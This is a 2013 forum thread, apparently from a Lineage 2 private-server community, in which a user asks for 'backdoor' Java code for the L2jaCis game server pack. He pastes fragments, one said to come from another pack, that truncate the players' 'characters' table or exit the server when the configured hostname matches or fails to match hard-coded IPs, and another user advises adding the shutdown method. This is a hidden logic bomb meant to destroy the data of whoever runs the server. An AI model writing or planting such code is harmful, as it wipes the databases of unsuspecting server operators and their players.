numl0ckas Posted July 24, 2013 Posted July 24, 2013 Hello, as topic says i need backdoor java code. If ip doesnt same as typed in gameserver.java where we put backdoor server doesnt turn on and all sql from navicat be deleted. Can someone help to me make it? Or share it:) PACK: L2jaCis if(Config.GAMESERVER_HOSTNAME.equals("77.120.16.18") || Config.GAMESERVER_HOSTNAME.equals("77.120.29.151")) ThreadPoolManager.getInstance().schedule(new Runnable() { public void run () { try { Connection con = L2DatabaseFactory.getInstance().getConnection(); con.prepareStatement("truncate table characters").execute(); ITS FROM LUCERA i dont know its good backdoor or no, but here is example:)
0 numl0ckas Posted July 28, 2013 Author Posted July 28, 2013 I need if IP who typed in backdoor code is in gameserver ip so its okey, server turns on, but if IP is typed 127.0.0.1 in backdoor code and in gameserver network ip is writed 127.1.1.1 server doesnt turn on, xdem you dont understand me:) if (!Config.GAMESERVER_HOSTNAME.equals("192.168.0.100") || !Config.GAMESERVER_HOSTNAME.equals("94.23.59.169")) { System.exit(-1); } This makes if ip is typed here and in configs so server doesnt start. I need if here ip is typed and in configs not, server doesnt start. I think you understand me
0 Diabaths Posted July 28, 2013 Posted July 28, 2013 look for the shutdown method in source and put it in the backdoor code
0 numl0ckas Posted July 28, 2013 Author Posted July 28, 2013 You dont understand me:) Read again that i say
0 Diabaths Posted July 28, 2013 Posted July 28, 2013 dude you need if backdoor ip not equal to gameserver ip the server not start..... and also i know why you want that!!!!!
Question
numl0ckas
Hello, as topic says i need backdoor java code.
If ip doesnt same as typed in gameserver.java where we put backdoor server doesnt turn on and all sql from navicat be deleted.
Can someone help to me make it? Or share it:)
PACK: L2jaCis
ITS FROM LUCERA i dont know its good backdoor or no, but here is example:)
21 answers to this question
Recommended Posts